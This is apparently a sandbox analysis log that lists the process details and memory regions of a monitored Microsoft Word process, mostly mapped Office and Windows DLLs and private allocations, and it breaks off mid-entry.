# Flog Txt Version 1 # Analyzer Version: 2024.2.1 # Analyzer Build Date: Mar 23 2024 12:02:19 # Log Creation Date: 10.06.2024 06:33:48.262 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files\\microsoft office\\office16\\winword.exe" page_root = "0x31af7000" os_pid = "0x1314" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x560" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE\" /n" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fc8c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 256 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 257 start_va = 0x5464010000 end_va = 0x546410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005464010000" filename = "" Region: id = 258 start_va = 0x5464200000 end_va = 0x54643fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005464200000" filename = "" Region: id = 259 start_va = 0x5464400000 end_va = 0x54644fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005464400000" filename = "" Region: id = 260 start_va = 0x5464600000 end_va = 0x54646fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005464600000" filename = "" Region: id = 261 start_va = 0x5464700000 end_va = 0x54647fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005464700000" filename = "" Region: id = 262 start_va = 0x5464800000 end_va = 0x54648fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005464800000" filename = "" Region: id = 263 start_va = 0x5464900000 end_va = 0x54649fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005464900000" filename = "" Region: id = 264 start_va = 0x5464a00000 end_va = 0x5464afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005464a00000" filename = "" Region: id = 265 start_va = 0x5464b00000 end_va = 0x5464bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005464b00000" filename = "" Region: id = 266 start_va = 0x5464c00000 end_va = 0x5464cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005464c00000" filename = "" Region: id = 267 start_va = 0x5464e00000 end_va = 0x5464efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005464e00000" filename = "" Region: id = 268 start_va = 0x5464f00000 end_va = 0x5464ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005464f00000" filename = "" Region: id = 269 start_va = 0x5465000000 end_va = 0x54650fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005465000000" filename = "" Region: id = 270 start_va = 0x5465100000 end_va = 0x54651fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005465100000" filename = "" Region: id = 271 start_va = 0x5465200000 end_va = 0x54652fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005465200000" filename = "" Region: id = 272 start_va = 0x5465300000 end_va = 0x54653fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005465300000" filename = "" Region: id = 273 start_va = 0x191239c0000 end_va = 0x191239cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000191239c0000" filename = "" Region: id = 274 start_va = 0x191239d0000 end_va = 0x191239d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000191239d0000" filename = "" Region: id = 275 start_va = 0x191239e0000 end_va = 0x191239f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000191239e0000" filename = "" Region: id = 276 start_va = 0x19123a00000 end_va = 0x19123a03fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019123a00000" filename = "" Region: id = 277 start_va = 0x19123a10000 end_va = 0x19123a13fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019123a10000" filename = "" Region: id = 278 start_va = 0x19123a20000 end_va = 0x19123a21fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019123a20000" filename = "" Region: id = 279 start_va = 0x19123a30000 end_va = 0x19123aedfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 280 start_va = 0x19123af0000 end_va = 0x19123af6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019123af0000" filename = "" Region: id = 281 start_va = 0x19123b00000 end_va = 0x19123b00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019123b00000" filename = "" Region: id = 282 start_va = 0x19123b10000 end_va = 0x19123b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019123b10000" filename = "" Region: id = 283 start_va = 0x19123b20000 end_va = 0x19123b20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019123b20000" filename = "" Region: id = 284 start_va = 0x19123b30000 end_va = 0x19123b31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019123b30000" filename = "" Region: id = 285 start_va = 0x19123b40000 end_va = 0x19123b41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019123b40000" filename = "" Region: id = 286 start_va = 0x19123b50000 end_va = 0x19123b50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019123b50000" filename = "" Region: id = 287 start_va = 0x19123b60000 end_va = 0x19123b60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019123b60000" filename = "" Region: id = 288 start_va = 0x19123b70000 end_va = 0x19123b71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019123b70000" filename = "" Region: id = 289 start_va = 0x19123b80000 end_va = 0x19123b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019123b80000" filename = "" Region: id = 290 start_va = 0x19123b90000 end_va = 0x19123b91fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019123b90000" filename = "" Region: id = 291 start_va = 0x19123ba0000 end_va = 0x19123ba1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019123ba0000" filename = "" Region: id = 292 start_va = 0x19123bb0000 end_va = 0x19123bb1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019123bb0000" filename = "" Region: id = 293 start_va = 0x19123bc0000 end_va = 0x19123bc1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019123bc0000" filename = "" Region: id = 294 start_va = 0x19123bd0000 end_va = 0x19123ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019123bd0000" filename = "" Region: id = 295 start_va = 0x19123cd0000 end_va = 0x19123e57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019123cd0000" filename = "" Region: id = 296 start_va = 0x19123e60000 end_va = 0x19123fe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019123e60000" filename = "" Region: id = 297 start_va = 0x19123ff0000 end_va = 0x191253effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019123ff0000" filename = "" Region: id = 298 start_va = 0x191253f0000 end_va = 0x191253f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000191253f0000" filename = "" Region: id = 299 start_va = 0x19125400000 end_va = 0x1912540ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019125400000" filename = "" Region: id = 300 start_va = 0x19125410000 end_va = 0x19125411fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019125410000" filename = "" Region: id = 301 start_va = 0x19125420000 end_va = 0x19125424fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 302 start_va = 0x19125430000 end_va = 0x1912544ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019125430000" filename = "" Region: id = 303 start_va = 0x19125450000 end_va = 0x19125608fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 304 start_va = 0x19125610000 end_va = 0x19125917fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso40uires.dll") Region: id = 305 start_va = 0x19125920000 end_va = 0x19126240fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso99lres.dll") Region: id = 306 start_va = 0x19126250000 end_va = 0x1912b08efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msores.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msores.dll") Region: id = 307 start_va = 0x1912b090000 end_va = 0x1912b14bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wwintl.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\1033\\WWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\1033\\wwintl.dll") Region: id = 308 start_va = 0x1912b150000 end_va = 0x1912b15ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 309 start_va = 0x1912b160000 end_va = 0x1912b16efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 310 start_va = 0x1912b170000 end_va = 0x1912b2eafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 311 start_va = 0x1912b390000 end_va = 0x1912b390fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912b390000" filename = "" Region: id = 312 start_va = 0x1912b3a0000 end_va = 0x1912b3a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912b3a0000" filename = "" Region: id = 313 start_va = 0x1912b3b0000 end_va = 0x1912b3b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b3b0000" filename = "" Region: id = 314 start_va = 0x1912b3c0000 end_va = 0x1912b3c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b3c0000" filename = "" Region: id = 315 start_va = 0x1912b490000 end_va = 0x1912b7c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 316 start_va = 0x1912b7d0000 end_va = 0x1912b8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b7d0000" filename = "" Region: id = 317 start_va = 0x1912b8d0000 end_va = 0x1912b8fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912b8d0000" filename = "" Region: id = 318 start_va = 0x1912b900000 end_va = 0x1912b900fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b900000" filename = "" Region: id = 319 start_va = 0x1912b910000 end_va = 0x1912b910fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b910000" filename = "" Region: id = 320 start_va = 0x1912b920000 end_va = 0x1912b920fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b920000" filename = "" Region: id = 321 start_va = 0x1912b930000 end_va = 0x1912b978fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 322 start_va = 0x1912b980000 end_va = 0x1912ba7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b980000" filename = "" Region: id = 323 start_va = 0x1912ba80000 end_va = 0x1912c27ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1560258661-3990802383-1811730007-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat") Region: id = 324 start_va = 0x1912c280000 end_va = 0x1912c67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912c280000" filename = "" Region: id = 325 start_va = 0x1912c680000 end_va = 0x1912c73bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912c680000" filename = "" Region: id = 326 start_va = 0x1912c740000 end_va = 0x1912c743fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912c740000" filename = "" Region: id = 327 start_va = 0x1912c750000 end_va = 0x1912cc41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912c750000" filename = "" Region: id = 328 start_va = 0x1912cc50000 end_va = 0x1912cc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cc50000" filename = "" Region: id = 329 start_va = 0x1912cc60000 end_va = 0x1912cc60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cc60000" filename = "" Region: id = 330 start_va = 0x1912cc70000 end_va = 0x1912cc70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cc70000" filename = "" Region: id = 331 start_va = 0x1912cc80000 end_va = 0x1912cc80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cc80000" filename = "" Region: id = 332 start_va = 0x1912cc90000 end_va = 0x1912cc96fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cc90000" filename = "" Region: id = 333 start_va = 0x1912cca0000 end_va = 0x1912cca4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cca0000" filename = "" Region: id = 334 start_va = 0x1912ccb0000 end_va = 0x1912ccb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912ccb0000" filename = "" Region: id = 335 start_va = 0x1912ccc0000 end_va = 0x1912cccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912ccc0000" filename = "" Region: id = 336 start_va = 0x1912ccd0000 end_va = 0x1912ccd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912ccd0000" filename = "" Region: id = 337 start_va = 0x1912cce0000 end_va = 0x1912cce4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 338 start_va = 0x1912ccf0000 end_va = 0x1912ccf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912ccf0000" filename = "" Region: id = 339 start_va = 0x1912cd00000 end_va = 0x1912cdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cd00000" filename = "" Region: id = 340 start_va = 0x1912ce00000 end_va = 0x1912ce00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 341 start_va = 0x1912ce10000 end_va = 0x1912ce24fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001b.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001b.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001b.db") Region: id = 342 start_va = 0x1912ce30000 end_va = 0x1912ce30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912ce30000" filename = "" Region: id = 343 start_va = 0x1912ce40000 end_va = 0x1912ce46fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912ce40000" filename = "" Region: id = 344 start_va = 0x1912ce50000 end_va = 0x1912ce51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912ce50000" filename = "" Region: id = 345 start_va = 0x1912ce60000 end_va = 0x1912ce61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912ce60000" filename = "" Region: id = 346 start_va = 0x1912ce80000 end_va = 0x1912ce8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912ce80000" filename = "" Region: id = 347 start_va = 0x1912ce90000 end_va = 0x1912d08ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912ce90000" filename = "" Region: id = 348 start_va = 0x1912d090000 end_va = 0x1912d88ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912d090000" filename = "" Region: id = 349 start_va = 0x1912d890000 end_va = 0x1912dc8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912d890000" filename = "" Region: id = 350 start_va = 0x1912dc90000 end_va = 0x1912dcd1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "d2d1.dll.mui" filename = "\\Windows\\System32\\en-US\\d2d1.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\d2d1.dll.mui") Region: id = 351 start_va = 0x1912dce0000 end_va = 0x1912dceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912dce0000" filename = "" Region: id = 352 start_va = 0x1912dcf0000 end_va = 0x1912ddcffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 353 start_va = 0x1912ddd0000 end_va = 0x1912decffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912ddd0000" filename = "" Region: id = 354 start_va = 0x1912ded0000 end_va = 0x1912eecffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 355 start_va = 0x1912eed0000 end_va = 0x1912efaefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 356 start_va = 0x1912f0f0000 end_va = 0x1912f1c5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912f0f0000" filename = "" Region: id = 357 start_va = 0x1912f1d0000 end_va = 0x1912f2a5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912f1d0000" filename = "" Region: id = 358 start_va = 0x1912f2b0000 end_va = 0x1912f2cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912f2b0000" filename = "" Region: id = 359 start_va = 0x1912f2d0000 end_va = 0x1912f2eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912f2d0000" filename = "" Region: id = 360 start_va = 0x1912f5d0000 end_va = 0x1912f5dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912f5d0000" filename = "" Region: id = 361 start_va = 0x1912f5e0000 end_va = 0x1912f5effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912f5e0000" filename = "" Region: id = 362 start_va = 0x1912f5f0000 end_va = 0x1912f5fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912f5f0000" filename = "" Region: id = 363 start_va = 0x1912f600000 end_va = 0x1912fa04fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912f600000" filename = "" Region: id = 364 start_va = 0x1912fa10000 end_va = 0x1912fe19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912fa10000" filename = "" Region: id = 365 start_va = 0x1912fe20000 end_va = 0x19130225fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912fe20000" filename = "" Region: id = 366 start_va = 0x19130230000 end_va = 0x191302affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019130230000" filename = "" Region: id = 367 start_va = 0x191302b0000 end_va = 0x191302c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 368 start_va = 0x191302d0000 end_va = 0x191302d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000191302d0000" filename = "" Region: id = 369 start_va = 0x191302e0000 end_va = 0x1913131ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 370 start_va = 0x19131340000 end_va = 0x1913153ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019131340000" filename = "" Region: id = 371 start_va = 0x19131540000 end_va = 0x19131d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019131540000" filename = "" Region: id = 372 start_va = 0x19131d40000 end_va = 0x1913221dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019131d40000" filename = "" Region: id = 373 start_va = 0x7ff711950000 end_va = 0x7ff71195ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff711950000" filename = "" Region: id = 374 start_va = 0x7ff711960000 end_va = 0x7ff711a5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff711960000" filename = "" Region: id = 375 start_va = 0x7ff711a60000 end_va = 0x7ff711a82fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff711a60000" filename = "" Region: id = 376 start_va = 0x7ff712990000 end_va = 0x7ff712b69fff monitored = 0 entry_point = 0x7ff712991530 region_type = mapped_file name = "winword.exe" filename = "\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE" (normalized: "c:\\program files\\microsoft office\\office16\\winword.exe") Region: id = 377 start_va = 0x7ffb146b0000 end_va = 0x7ffb146bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb146b0000" filename = "" Region: id = 378 start_va = 0x7ffb34050000 end_va = 0x7ffb34b48fff monitored = 0 entry_point = 0x7ffb34107a3c region_type = mapped_file name = "chart.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\CHART.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\chart.dll") Region: id = 379 start_va = 0x7ffb34b50000 end_va = 0x7ffb34d72fff monitored = 0 entry_point = 0x7ffb34b52bf0 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\riched20.dll") Region: id = 380 start_va = 0x7ffb34d80000 end_va = 0x7ffb3605bfff monitored = 0 entry_point = 0x7ffb34d8caf0 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso.dll") Region: id = 381 start_va = 0x7ffb36060000 end_va = 0x7ffb3682bfff monitored = 0 entry_point = 0x7ffb360f5f94 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 382 start_va = 0x7ffb36830000 end_va = 0x7ffb3711afff monitored = 0 entry_point = 0x7ffb36935a48 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 383 start_va = 0x7ffb37120000 end_va = 0x7ffb37597fff monitored = 0 entry_point = 0x7ffb37199154 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 384 start_va = 0x7ffb375a0000 end_va = 0x7ffb378a3fff monitored = 0 entry_point = 0x7ffb37646094 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 385 start_va = 0x7ffb378b0000 end_va = 0x7ffb38a1bfff monitored = 0 entry_point = 0x7ffb378b53f0 region_type = mapped_file name = "oart.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\OART.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\oart.dll") Region: id = 386 start_va = 0x7ffb38a20000 end_va = 0x7ffb3adbefff monitored = 0 entry_point = 0x7ffb38a317e0 region_type = mapped_file name = "wwlib.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\WWLIB.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\wwlib.dll") Region: id = 387 start_va = 0x7ffb3de60000 end_va = 0x7ffb3de66fff monitored = 0 entry_point = 0x7ffb3de61220 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 388 start_va = 0x7ffb40090000 end_va = 0x7ffb4012cfff monitored = 0 entry_point = 0x7ffb40091010 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 389 start_va = 0x7ffb40130000 end_va = 0x7ffb4029ffff monitored = 0 entry_point = 0x7ffb40263158 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msptls.dll") Region: id = 390 start_va = 0x7ffb41990000 end_va = 0x7ffb41b38fff monitored = 0 entry_point = 0x7ffb419e4060 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\gdiplus.dll") Region: id = 391 start_va = 0x7ffb438a0000 end_va = 0x7ffb438ddfff monitored = 0 entry_point = 0x7ffb438a9650 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 392 start_va = 0x7ffb46780000 end_va = 0x7ffb46ab9fff monitored = 0 entry_point = 0x7ffb46788520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 393 start_va = 0x7ffb46ac0000 end_va = 0x7ffb46acbfff monitored = 0 entry_point = 0x7ffb46ac4150 region_type = mapped_file name = "vcruntime140_1.dll" filename = "\\Windows\\System32\\vcruntime140_1.dll" (normalized: "c:\\windows\\system32\\vcruntime140_1.dll") Region: id = 394 start_va = 0x7ffb46ad0000 end_va = 0x7ffb46b60fff monitored = 0 entry_point = 0x7ffb46b22430 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\System32\\msvcp140.dll" (normalized: "c:\\windows\\system32\\msvcp140.dll") Region: id = 395 start_va = 0x7ffb46b70000 end_va = 0x7ffb46b88fff monitored = 0 entry_point = 0x7ffb46b7ee50 region_type = mapped_file name = "vcruntime140.dll" filename = 